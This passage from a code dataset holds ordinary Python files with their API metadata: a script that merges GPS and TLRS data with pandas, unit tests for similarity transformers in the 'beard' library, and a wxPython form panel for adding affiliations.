"flask.flash", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 38, "usage_type": "call"}, {"api_name": "app.db.categories.delete_one", "line_number": 42, "usage_type": "call"}, {"api_name": "app.db.categories", "line_number": 42, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 42, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 44, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 44, "usage_type": "call"}]} +{"seq_id": "163851120", "text": "#!/usr/bin/env python\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\nimport time, sys\nfrom IPython.display import clear_output\n\nimport argparse\n\n\ndef f(t_gps, t_unix):\n t_unix_mod = np.floor(t_unix % 60)\n\n if t_gps != t_unix_mod:\n\n delta = t_unix_mod - t_gps\n #print(delta)\n #print(t_unix) \n if abs(delta) < 30:\n t_unix += -1 * delta\n elif abs(delta + 60) < 30:\n t_unix += (-1 * delta) - 60\n elif abs(delta - 60) < 30:\n t_unix += (-1 * delta) + 60\n else:\n print(\"GPS time differs by >60s from UNIX time.\")\n \n return t_unix\n\ndef update_progress(progress):\n bar_length = 20\n if isinstance(progress, int):\n progress = float(progress)\n if not isinstance(progress, float):\n progress = 0\n if progress < 0:\n progress = 0\n if progress >= 1:\n progress = 1\n\n block = int(round(bar_length * progress))\n\n clear_output(wait = True)\n text = \"Progress: [{0}] 
{1:.1f}%\".format( \"#\" * block + \"-\" * (bar_length - block), progress * 100)\n print(text)\n\nnumber_of_elements = 1000\n\n#for i in range(number_of_elements):\n #time.sleep(0.00001) #Replace this with a real computation\n# update_progress(i / number_of_elements)\n\n#update_progress(1)\n\ndef main(gps_file, tlrs_file, output=None):\n\n gps_df = pd.read_csv(gps_file)\n print(gps_df)\n sample = gps_df.loc[0::]\n\n x = sample.loc[:]['SGPSBA_POSITIONX']\n y = sample.loc[:]['SGPSBA_POSITIONY']\n z = sample.loc[:]['SGPSBA_POSITIONZ']\n\n lat = np.arctan2(z, np.sqrt(x**2 + y**2)) * 180. / np.pi\n lon = np.arctan2(y, x) * 180. / np.pi\n\n GPS_seconds = sample.loc[:]['SGPSBA_SECONDS']\n #Get MET and add subsections seconds\n UNIX_t = np.floor(sample.loc[:]['TSTAMP']-978307200)\n UNIX_t += sample.loc[:]['SGPSBA_SUBSECS']\n\n # Generate new data frame for time, lat, lon.\n tll_df = pd.DataFrame(data={'time': np.array([f(t_gps, t_unix) for t_gps, t_unix in zip(GPS_seconds, UNIX_t)]), \n 'lat':lat, \n 'lon':lon\n }\n )\n\n print(f\"Loaded TLL datafile {gps_file}.\")\n l_orig = len(tll_df)\n tll_df.drop_duplicates(subset='time', inplace=True)\n l_new = len(tll_df)\n print(f\"File contains {l_orig} entries and {l_new} non-duplicates.\")\n print(\"Done.\")\n\n\n # In[10]:\n\n\n # Last term drops the NaN at the end of the frame. \n tlrs_df = pd.read_csv(tlrs_file, header=None, delimiter=' ').iloc[:,0:-1] \n # Set column names. \n tlrs_df.columns = ['time' if x==0 else x-1 for x in tlrs_df.columns]\n print(f\"LRS data loaded. Number events: {len(tlrs_df)}\")\n print(len(tlrs_df))\n tlrs_df.drop_duplicates(subset='time', inplace=True)\n print(f\"LRS duplicates dropped. Remaining events: {len(tlrs_df)}\")\n print(len(tlrs_df))\n tlrs_sorted_df = tlrs_df.sort_values('time')\n print(\"LRS sorted.\")\n print(\"Done.\")\n\n\n merged = pd.merge(tll_df, tlrs_df, \n left_on=tll_df['time'].astype(int), \n right_on=tlrs_df['time'].astype(int), suffixes=['_tll', '_tlrs'],\n how='inner', copy=False)\n\n print(f\"Merge complete.\")\n print(len(merged))\n merged.drop_duplicates(subset=['time_tll', 'time_tlrs'], inplace=True)\n print(len(merged))\n\n\n if output is None:\n merged.to_csv('merged.csv')\n else:\n merged.to_csv(output)\n\n\n return\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description=\"Load and merge TLL and TLRS data files.\")\n\n parser.add_argument(\"--gps\", type=str, help=\"gps data file.\")\n parser.add_argument(\"--tlrs\", type=str, help=\"TLRS data file.\")\n parser.add_argument(\"--output\", type=str, help=\"Output filename.\" ) \n\n args = parser.parse_args()\n print(args)\n\n\n\n main(args.gps, args.tlrs, args.output)", "sub_path": "make_merged.py", "file_name": "make_merged.py", "file_ext": "py", "file_size_in_byte": 3949, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "numpy.floor", "line_number": 16, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 47, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 69, "usage_type": "attribute"}, {"api_name": "numpy.arctan2", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 70, "usage_type": "attribute"}, {"api_name": "numpy.floor", "line_number": 74, "usage_type": 
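The f() helper above nudges a UNIX timestamp so that its seconds-within-minute field agrees with the GPS seconds counter, handling wrap-around at minute boundaries. A self-contained restatement of the same arithmetic with a worked value:

import numpy as np

def align_unix_to_gps(t_gps, t_unix):
    # Difference between the UNIX clock's seconds-within-minute field
    # and the GPS seconds counter.
    delta = np.floor(t_unix % 60) - t_gps
    if abs(delta) < 30:
        return t_unix - delta
    if abs(delta + 60) < 30:      # wrap: the UNIX field just rolled over
        return t_unix - delta - 60
    if abs(delta - 60) < 30:      # wrap: the GPS field just rolled over
        return t_unix - delta + 60
    raise ValueError("GPS time differs by >60s from UNIX time")

# UNIX stamp reads :58 while GPS already says :02 -> shift forward by 4s.
print(align_unix_to_gps(2, 1000000798.0))   # 1000000802.0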
"call"}, {"api_name": "pandas.DataFrame", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 78, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 96, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 109, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 130, "usage_type": "call"}]} +{"seq_id": "278569717", "text": "# -*- coding: utf-8 -*-\n#\n# This file is part of Beard.\n# Copyright (C) 2015 CERN.\n#\n# Beard is a free software; you can redistribute it and/or modify it\n# under the terms of the Revised BSD License; see LICENSE file for\n# more details.\n\n\"\"\"Tests of transformers for paired data.\n\n.. codeauthor:: Gilles Louppe \n\n\"\"\"\n\nimport numpy as np\nfrom numpy.testing import assert_array_almost_equal\nimport scipy.sparse as sp\n\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.preprocessing import StandardScaler\n\nfrom beard.similarity import PairTransformer\nfrom beard.similarity import CosineSimilarity\nfrom beard.similarity import AbsoluteDifference\nfrom beard.similarity import JaccardSimilarity\nfrom beard.utils import FuncTransformer\n\n\ndef test_pair_transformer():\n \"\"\"Test for PairTransformer.\"\"\"\n X = np.array([[0, 1], [2, 0], [2, 5]], dtype=np.float)\n tf = PairTransformer(element_transformer=FuncTransformer(lambda v: v + 1))\n Xt = tf.fit_transform(X)\n assert_array_almost_equal(Xt, X + 1)\n\n X = np.array([[0, 1], [2, 0], [2, 5],\n [0, 1], [2, 0], [2, 5]], dtype=np.float)\n tf = PairTransformer(element_transformer=FuncTransformer(lambda v: v + 1),\n groupby=lambda r: r[0])\n Xt = tf.fit_transform(X)\n assert_array_almost_equal(Xt, X + 1)\n\n X = np.array([[0, 1], [2, 3], [4, 5]], dtype=np.float)\n Xt = PairTransformer(element_transformer=MinMaxScaler()).fit_transform(X)\n assert_array_almost_equal(Xt, [[0, 0.2], [0.4, 0.6], [0.8, 1.0]])\n\n X = np.array([[0, 1], [2, 3]], dtype=np.float)\n tf = PairTransformer(element_transformer=OneHotEncoder(sparse=True))\n Xt = tf.fit_transform(X)\n assert sp.issparse(Xt)\n assert_array_almost_equal(Xt.todense(), [[1, 0, 0, 0, 0, 1, 0, 0],\n [0, 0, 1, 0, 0, 0, 0, 1]])\n\n X = sp.csr_matrix(np.array([[0, 1], [2, 3]], dtype=np.float))\n tf = PairTransformer(element_transformer=StandardScaler(with_mean=False))\n Xt = tf.fit_transform(X)\n assert sp.issparse(Xt)\n assert_array_almost_equal(Xt.todense(), [[0, 0.89442719],\n [1.78885438, 2.68328157]])\n\n\ndef test_cosine_similarity():\n \"\"\"Test for CosineSimilarity.\"\"\"\n X = np.array([[1, 0, 0, 0, 0, 0],\n [1, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 0, 0],\n [0, 0, 0, 0, 0, 0],\n [1, 1, 1, 1, 1, 1]])\n\n Xt = CosineSimilarity().fit_transform(X)\n assert_array_almost_equal(Xt, [[0.], [2 ** -0.5], [1.], [0.], [1.]])\n\n Xt = CosineSimilarity().fit_transform(sp.csr_matrix(X))\n assert_array_almost_equal(Xt, [[0.], [2 ** -0.5], [1.], [0.], [1.]])\n\n\ndef test_absolute_difference():\n \"\"\"Test for AbsoluteDifference.\"\"\"\n X = np.array([[0, 0, 0, 0],\n [0, 1, 1, 0],\n [1, 1, 1, 1],\n [1, 0, 0, 1]])\n\n Xt = AbsoluteDifference().fit_transform(X)\n assert_array_almost_equal(Xt, [[0, 0], [1, 1], [0, 0], [1, 1]])\n\n Xt = AbsoluteDifference().fit_transform(sp.csr_matrix(X))\n assert_array_almost_equal(Xt, [[0, 0], [1, 1], [0, 0], [1, 1]])\n\n\ndef test_JaccardSimilarity():\n \"\"\"Test for JaccardSimilarity.\"\"\"\n X = np.array([[0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 1, 0, 1, 0, 1],\n [0, 1, 0, 1, 0, 0, 1, 0],\n [1, 
0, 1, 1, 1, 1, 0, 7],\n [0, 3, 0, 1, 0, 9, 0, 1]])\n\n Xt = JaccardSimilarity().fit_transform(X)\n assert_array_almost_equal(Xt, [[0.], [0.33333333], [0.], [0.5], [1.]])\n\n Xt = JaccardSimilarity().fit_transform(sp.csr_matrix(X))\n assert_array_almost_equal(Xt, [[0.], [0.33333333], [0.], [0.5], [1.]])\n\n X = np.array([[0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0]])\n\n Xt = JaccardSimilarity().fit_transform(X)\n assert_array_almost_equal(Xt, [[0.], [0.], [0.], [0.]])\n\n Xt = JaccardSimilarity().fit_transform(sp.csr_matrix(X))\n assert_array_almost_equal(Xt, [[0.], [0.], [0.], [0.]])\n", "sub_path": "tests/similarity/test_pairs.py", "file_name": "test_pairs.py", "file_ext": "py", "file_size_in_byte": 4166, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "numpy.array", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 33, "usage_type": "attribute"}, {"api_name": "beard.similarity.PairTransformer", "line_number": 34, "usage_type": "call"}, {"api_name": "beard.utils.FuncTransformer", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 39, "usage_type": "attribute"}, {"api_name": "beard.similarity.PairTransformer", "line_number": 40, "usage_type": "call"}, {"api_name": "beard.utils.FuncTransformer", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 45, "usage_type": "attribute"}, {"api_name": "beard.similarity.PairTransformer", "line_number": 46, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 49, "usage_type": "attribute"}, {"api_name": "beard.similarity.PairTransformer", "line_number": 50, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.OneHotEncoder", "line_number": 50, "usage_type": "call"}, {"api_name": "scipy.sparse.issparse", "line_number": 52, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 52, "usage_type": "name"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 53, "usage_type": "call"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 56, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 56, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 56, "usage_type": "attribute"}, {"api_name": "beard.similarity.PairTransformer", "line_number": 57, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 57, "usage_type": "call"}, {"api_name": "scipy.sparse.issparse", "line_number": 59, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 59, "usage_type": "name"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 66, "usage_type": "call"}, {"api_name": 
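The CosineSimilarity expectations above make sense once each row is read as two stacked feature vectors: the transformer emits the cosine of the two halves, with an all-zero half mapped to similarity 0. The same computation in plain NumPy, for intuition (this is a sketch, not beard's implementation):

import numpy as np

def pairwise_cosine(X):
    half = X.shape[1] // 2
    a, b = X[:, :half], X[:, half:]
    num = np.einsum("ij,ij->i", a, b)                      # row-wise dot products
    denom = np.linalg.norm(a, axis=1) * np.linalg.norm(b, axis=1)
    out = np.zeros(len(X))
    nonzero = denom > 0        # all-zero halves yield 0, matching the tests
    out[nonzero] = num[nonzero] / denom[nonzero]
    return out.reshape(-1, 1)

X = np.array([[1.0, 0, 1, 1, 0, 0]])      # halves [1, 0, 1] and [1, 0, 0]
print(pairwise_cosine(X))                  # [[0.70710678]] i.e. 2 ** -0.5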
"beard.similarity.CosineSimilarity", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 73, "usage_type": "call"}, {"api_name": "beard.similarity.CosineSimilarity", "line_number": 75, "usage_type": "call"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 75, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 75, "usage_type": "name"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 81, "usage_type": "call"}, {"api_name": "beard.similarity.AbsoluteDifference", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 87, "usage_type": "call"}, {"api_name": "beard.similarity.AbsoluteDifference", "line_number": 89, "usage_type": "call"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 89, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 89, "usage_type": "name"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 95, "usage_type": "call"}, {"api_name": "beard.similarity.JaccardSimilarity", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 102, "usage_type": "call"}, {"api_name": "beard.similarity.JaccardSimilarity", "line_number": 104, "usage_type": "call"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 104, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 104, "usage_type": "name"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 107, "usage_type": "call"}, {"api_name": "beard.similarity.JaccardSimilarity", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 113, "usage_type": "call"}, {"api_name": "beard.similarity.JaccardSimilarity", "line_number": 115, "usage_type": "call"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 115, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 115, "usage_type": "name"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 116, "usage_type": "call"}]} +{"seq_id": "184898500", "text": "import wx\n\ntry:\n from agw import pycollapsiblepane as PCP\nexcept ImportError:\n import wx.lib.agw.pycollapsiblepane as PCP\n\nfrom src.wizard.controller.frmRequiredValidator \\\n import RequiredValidator\nfrom src.wizard.controller.frmRequiredComboValidator \\\n import RequiredComboValidator\n\nclass NewAffiliationView(wx.Panel):\n def __init__( self, parent ):\n wx.Panel.__init__ ( self, parent, id = wx.ID_ANY, pos = wx.DefaultPosition, size = wx.Size( 542,300 ), style = wx.TAB_TRAVERSAL )\n \n self.SetMinSize( wx.Size( 442,550 ) )\n \n bSizer80 = wx.BoxSizer( wx.VERTICAL )\n \n sbSizer22 = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u\"Person:\" ), wx.VERTICAL )\n \n bSizer35 = wx.BoxSizer( wx.HORIZONTAL )\n \n self.m_staticText31 = wx.StaticText( sbSizer22.GetStaticBox(), wx.ID_ANY, u\"Existing person\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText31.Wrap( -1 )\n bSizer35.Add( self.m_staticText31, 0, wx.ALL, 5 )\n \n \n bSizer35.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 )\n \n m_comboBox13Choices = []\n self.m_comboBox13 = wx.ComboBox( sbSizer22.GetStaticBox(), wx.ID_ANY, u\"\", wx.DefaultPosition, wx.DefaultSize, 
m_comboBox13Choices, 0 )\n self.m_comboBox13.SetMinSize( wx.Size( 280,-1 ) )\n \n bSizer35.Add( self.m_comboBox13, 0, wx.ALL, 5 )\n \n \n sbSizer22.Add( bSizer35, 0, wx.EXPAND, 10 ) # Denver\n\n newPersonSizer = wx.BoxSizer( wx.VERTICAL )\n firstMiddleSizer = wx.BoxSizer(wx.HORIZONTAL)\n \n lblFirst = wx.StaticText( sbSizer22.GetStaticBox(), wx.ID_ANY, u\"First Name:\",\n wx.DefaultPosition, wx.DefaultSize, 0)\n firstMiddleSizer.Add(lblFirst, 0, wx.ALL, 5)\n \n firstMiddleSizer.AddSpacer((0,0), 1, wx.EXPAND, 5)\n\n self.textFirst = wx.TextCtrl(sbSizer22.GetStaticBox(), wx.ID_ANY,\n wx.EmptyString,\n wx.DefaultPosition, wx.Size(100,-1), validator=RequiredValidator())\n firstMiddleSizer.Add(self.textFirst, 0, wx.ALL, 5)\n \n lblMiddle = wx.StaticText( sbSizer22.GetStaticBox(), wx.ID_ANY, u\"Middle:\",\n wx.DefaultPosition, wx.DefaultSize, 0)\n firstMiddleSizer.Add(lblMiddle, 0, wx.ALL, 5)\n \n self.textMiddle = wx.TextCtrl(sbSizer22.GetStaticBox(), wx.ID_ANY,\n wx.EmptyString,\n wx.DefaultPosition, wx.Size(100,-1), 0)\n firstMiddleSizer.Add(self.textMiddle, 0, wx.ALL, 5)\n \n newPersonSizer.Add(firstMiddleSizer, 0, wx.EXPAND, 5) #denver\n\n lastSizer = wx.BoxSizer(wx.HORIZONTAL)\n \n lblLast = wx.StaticText( sbSizer22.GetStaticBox(), wx.ID_ANY, u\"Last Name:\",\n wx.DefaultPosition, wx.DefaultSize, 0)\n lastSizer.Add(lblLast, 0, wx.ALL, 5)\n \n lastSizer.AddSpacer((0,0), 1, wx.EXPAND, 5)\n\n self.textLast = wx.TextCtrl(sbSizer22.GetStaticBox(), wx.ID_ANY,\n wx.EmptyString,\n wx.DefaultPosition, wx.Size(280,-1), validator=RequiredValidator())\n lastSizer.Add(self.textLast, 0, wx.ALL, 5)\n \n newPersonSizer.Add(lastSizer, 0, wx.EXPAND, 5) # Denver\n\n sbSizer22.Add(newPersonSizer, 0, wx.EXPAND, 5) # Denver\n #self.cp = cp = PCP.PyCollapsiblePane(self, wx.ID_ANY, \"Add new person...\", agwStyle=wx.CP_GTK_EXPANDER, style=wx.CP_DEFAULT_STYLE)\n #self.MakePaneContent(cp.GetPane())\n \n #cpSizer.Add( cp, 1, wx.LEFT|wx.EXPAND, 25 )\n #sbSizer22.Add( cpSizer, 1, wx.EXPAND|wx.GROW, 5)\n \n \n bSizer80.Add( sbSizer22, 0, wx.EXPAND, 5 ) # Denver\n \n sbSizer221 = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u\"Orgnaization:\" ), wx.VERTICAL )\n \n bSizer351 = wx.BoxSizer( wx.HORIZONTAL )\n \n self.m_staticText311 = wx.StaticText( sbSizer221.GetStaticBox(), wx.ID_ANY, u\"Existing organization\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText311.Wrap( -1 )\n bSizer351.Add( self.m_staticText311, 0, wx.ALL, 5 )\n \n \n bSizer351.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 )\n \n m_comboBox131Choices = []\n self.m_comboBox131 = wx.ComboBox( sbSizer221.GetStaticBox(), wx.ID_ANY, u\"\", wx.DefaultPosition, wx.DefaultSize, m_comboBox131Choices, 0 )\n self.m_comboBox131.SetMinSize( wx.Size( 280,-1 ) )\n \n bSizer351.Add( self.m_comboBox131, 0, wx.ALL, 5 )\n \n \n sbSizer221.Add( bSizer351, 0, wx.EXPAND, 5 ) #denver\n \n newOrgSizer = wx.BoxSizer(wx.HORIZONTAL)\n \n lblType = wx.StaticText( sbSizer221.GetStaticBox(), wx.ID_ANY, \n u\"Type:\", wx.DefaultPosition, wx.DefaultSize, 0)\n lblType.Wrap( -1 )\n newOrgSizer.Add(lblType, 0, wx.ALL, 5 )\n \n newOrgSizer.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 )\n \n typeChoices = []\n self.orgTypeCombo = wx.ComboBox( sbSizer221.GetStaticBox(), wx.ID_ANY,\n u\"Select Type\", wx.DefaultPosition, wx.DefaultSize,\n typeChoices, validator=RequiredComboValidator() )\n self.orgTypeCombo.SetMinSize(wx.Size( 280,-1 ) )\n \n newOrgSizer.Add( self.orgTypeCombo, 0, wx.ALL, 5 )\n sbSizer221.Add(newOrgSizer, 0, wx.EXPAND, 5) #Denver\n \n newOrgSizer1 = wx.BoxSizer(wx.HORIZONTAL)\n 
\n lblCode = wx.StaticText( sbSizer221.GetStaticBox(), wx.ID_ANY, \n u\"Code:\", wx.DefaultPosition, wx.DefaultSize, 0)\n lblCode.Wrap( -1 )\n newOrgSizer1.Add(lblCode, 0, wx.ALL, 5 )\n newOrgSizer1.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 )\n \n self.textCode = wx.TextCtrl(sbSizer221.GetStaticBox(), wx.ID_ANY,\n wx.EmptyString,\n wx.DefaultPosition, wx.Size(280,-1), validator=RequiredValidator())\n newOrgSizer1.Add(self.textCode, 0, wx.ALL, 5)\n \n\n sbSizer221.Add(newOrgSizer1, 0, wx.EXPAND, 5 ) # Denver\n \n newOrgSizer2 = wx.BoxSizer(wx.HORIZONTAL)\n\n lblName = wx.StaticText( sbSizer221.GetStaticBox(), wx.ID_ANY, \n u\"Name:\", wx.DefaultPosition, wx.DefaultSize, 0)\n lblName.Wrap( -1 )\n newOrgSizer2.Add(lblName, 0, wx.ALL, 5 )\n \n newOrgSizer2.AddSpacer((0,0), 1, wx.EXPAND, 5)\n \n self.textName = wx.TextCtrl(sbSizer221.GetStaticBox(), wx.ID_ANY,\n wx.EmptyString,\n wx.DefaultPosition, wx.Size(280,-1), validator=RequiredValidator())\n newOrgSizer2.Add(self.textName, 0, wx.ALL, 5)\n \n sbSizer221.Add(newOrgSizer2, 0, wx.EXPAND, 5) #Denevr\n \n newOrgSizer3 = wx.BoxSizer(wx.HORIZONTAL)\n \n lblDesc = wx.StaticText( sbSizer221.GetStaticBox(), wx.ID_ANY, \n u\"Description:\", wx.DefaultPosition, wx.DefaultSize, 0)\n lblName.Wrap(-1)\n newOrgSizer3.Add(lblDesc, 0, wx.ALL, 5 )\n \n newOrgSizer3.AddSpacer((0,0), 1, wx.EXPAND, 5)\n \n self.textDesc = wx.TextCtrl(sbSizer221.GetStaticBox(), wx.ID_ANY,\n wx.EmptyString,\n wx.DefaultPosition, wx.Size(280,70), wx.TE_MULTILINE)\n newOrgSizer3.Add(self.textDesc, 0, wx.ALL, 5)\n \n sbSizer221.Add(newOrgSizer3, 0, wx.EXPAND, 5) #Denver\n \n newOrgSizer4 = wx.BoxSizer(wx.HORIZONTAL)\n\n lblLink = wx.StaticText( sbSizer221.GetStaticBox(), wx.ID_ANY, \n u\"Link:\", wx.DefaultPosition, wx.DefaultSize, 0)\n lblLink.Wrap(-1)\n newOrgSizer4.Add(lblLink, 0, wx.ALL, 5 )\n \n newOrgSizer4.AddSpacer((0,0), 1, wx.EXPAND, 5)\n \n self.textLink = wx.TextCtrl(sbSizer221.GetStaticBox(), wx.ID_ANY,\n wx.EmptyString,\n wx.DefaultPosition, wx.Size(280,-1), 0)\n newOrgSizer4.Add(self.textLink, 0, wx.ALL, 5)\n \n sbSizer221.Add(newOrgSizer4, 0, wx.EXPAND, 5) # Denver\n \n newOrgSizer5 = wx.BoxSizer(wx.HORIZONTAL)\n\n lblParent = wx.StaticText( sbSizer221.GetStaticBox(), wx.ID_ANY, \n u\"Parent Organization:\", wx.DefaultPosition, wx.DefaultSize, 0)\n lblParent.Wrap(-1)\n newOrgSizer5.Add(lblParent, 0, wx.ALL, 5 )\n \n newOrgSizer5.AddSpacer((0,0), 1, wx.EXPAND, 5)\n \n self.comboParent = wx.ComboBox(sbSizer221.GetStaticBox(), wx.ID_ANY, u\"Select Parent Organization\", wx.DefaultPosition, wx.DefaultSize, [], 0)\n self.comboParent.SetMinSize(wx.Size(280,-1))\n newOrgSizer5.Add(self.comboParent, 0, wx.ALL, 5)\n \n sbSizer221.Add(newOrgSizer5, 0, wx.EXPAND, 5)\n bSizer80.Add( sbSizer221, 0, wx.EXPAND, 5 )\n \n m_sdbSizer10 = wx.StdDialogButtonSizer()\n self.m_sdbSizer10OK = wx.Button( self, wx.ID_OK )\n m_sdbSizer10.AddButton( self.m_sdbSizer10OK )\n self.m_sdbSizer10Cancel = wx.Button( self, wx.ID_CANCEL )\n m_sdbSizer10.AddButton( self.m_sdbSizer10Cancel )\n m_sdbSizer10.Realize();\n \n bSizer80.Add( m_sdbSizer10, 1, wx.EXPAND, 5 )\n \n self.SetSizer( bSizer80 )\n self.Layout()\n \n\n\n\n\n def MakePaneContent(self, pane):\n \n nameLbl = wx.StaticText(pane, -1, \"Name:\")\n name = wx.TextCtrl(pane, -1, \"\");\n \n addrLbl = wx.StaticText(pane, -1, \"Address:\")\n addr1 = wx.TextCtrl(pane, -1, \"\");\n addr2 = wx.TextCtrl(pane, -1, \"\");\n \n cstLbl = wx.StaticText(pane, -1, \"City, State, Zip:\")\n city = wx.TextCtrl(pane, -1, \"\", size=(150,-1));\n state = 
wx.TextCtrl(pane, -1, \"\", size=(50,-1));\n zip = wx.TextCtrl(pane, -1, \"\", size=(70,-1));\n \n addrSizer = wx.FlexGridSizer(cols=2, hgap=5, vgap=5)\n addrSizer.AddGrowableCol(1)\n addrSizer.Add(nameLbl, 0, \n wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL)\n addrSizer.Add(name, 0, wx.EXPAND)\n addrSizer.Add(addrLbl, 0,\n wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL)\n addrSizer.Add(addr1, 0, wx.EXPAND)\n addrSizer.Add((5,5)) \n addrSizer.Add(addr2, 0, wx.EXPAND)\n \n addrSizer.Add(cstLbl, 0,\n wx.ALIGN_RIGHT|wx.ALIGN_CENTER_VERTICAL)\n \n cstSizer = wx.BoxSizer(wx.HORIZONTAL)\n cstSizer.Add(city, 1)\n cstSizer.Add(state, 0, wx.LEFT|wx.RIGHT, 5)\n cstSizer.Add(zip)\n addrSizer.Add(cstSizer, 0, wx.EXPAND)\n \n border = wx.BoxSizer()\n border.Add(addrSizer, 1, wx.EXPAND|wx.ALL, 5)\n pane.SetSizer(border)\n\n\n\n", "sub_path": "src/wizard/view/clsAddAffiliationPanel.py", "file_name": "clsAddAffiliationPanel.py", "file_ext": "py", "file_size_in_byte": 10530, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "wx.Panel", "line_number": 13, "usage_type": "attribute"}, {"api_name": "wx.Panel.__init__", "line_number": 15, "usage_type": "call"}, {"api_name": "wx.Panel", "line_number": 15, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 15, "usage_type": "attribute"}, {"api_name": "wx.DefaultPosition", "line_number": 15, "usage_type": "attribute"}, {"api_name": "wx.Size", "line_number": 15, "usage_type": "call"}, {"api_name": "wx.TAB_TRAVERSAL", "line_number": 15, "usage_type": "attribute"}, {"api_name": "wx.Size", "line_number": 17, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 19, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 19, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 21, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 21, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 21, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 21, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 23, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 23, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 25, "usage_type": "call"}, 